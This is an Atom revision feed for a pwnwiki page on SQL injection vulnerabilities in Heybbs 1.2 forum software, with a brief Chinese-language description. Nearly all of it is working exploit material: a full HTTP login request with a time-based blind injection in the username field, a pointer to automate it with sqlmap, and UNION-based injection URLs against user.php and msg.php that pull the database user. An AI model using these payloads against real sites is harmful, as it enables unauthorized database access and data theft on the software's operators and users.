https://pwnwiki.com/index.php?action=history&feed=atom&title=Heybbs_1.2_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E 2026-04-11T09:17:49Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Heybbs_1.2_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1694&oldid=prev 2021-04-15T13:25:41Z

<p>Created page with &quot;第一處注入存在於login.php文件的username參數處： &lt;pre&gt; POST /php/login.php HTTP/1.1 Host: www.0-sec.org Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insec...&quot;</p> <p><b>New page</b></p><div>第一處注入存在於login.php文件的username參數處：<br /> &lt;pre&gt;<br /> POST /php/login.php HTTP/1.1<br /> Host: www.0-sec.org<br /> Content-Length: 98<br /> Cache-Control: max-age=0<br /> Upgrade-Insecure-Requests: 1<br /> Origin: http://www.0-sec.org<br /> Content-Type: application/x-www-form-urlencoded<br /> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br /> Referer: http://www.0-sec.org/login.php<br /> Accept-Encoding: gzip, deflate<br /> Accept-Language: zh-CN,zh;q=0.9<br /> Cookie: PHPSESSID=qmpkek4l3ojr30gtodf6nj4hp4<br /> Connection: close<br /> <br /> username=123123' and (select 1 from (select(sleep(5)))accn) AND '1'='1&amp;password=123123&amp;verify=h4ir<br /> &lt;/pre&gt;<br /> <br /> 將username標*放入sqlmap -r<br /> <br /> 第二處注入存在於user.php文件id參數處<br /> <br /> Eg:<br /> &lt;pre&gt;<br /> http://www.0-sec.org/user.php?id=177 and 1=2 union select 1) ,user(),3,4,5,6,7,8,9,10<br /> &lt;/pre&gt;<br /> <br /> 第三處注入存在於msg.php文件id參數處<br /> <br /> Eg:<br /> <br /> &lt;pre&gt;http://www.0-sec.org/msg.php?id=1 and 1=2 union select 1) ,2,3,user(),5,6,7,8,9,10,11,12&lt;/pre&gt;<br /> <br /> Eg:<br /> <br /> &lt;pre&gt;http://www.0-sec.org/msg.php?id=1 and 1=2 union select 1) ,2,3,user(),5,6,7,8,9,10,11,12&lt;/pre&gt;</div>

Pwnwiki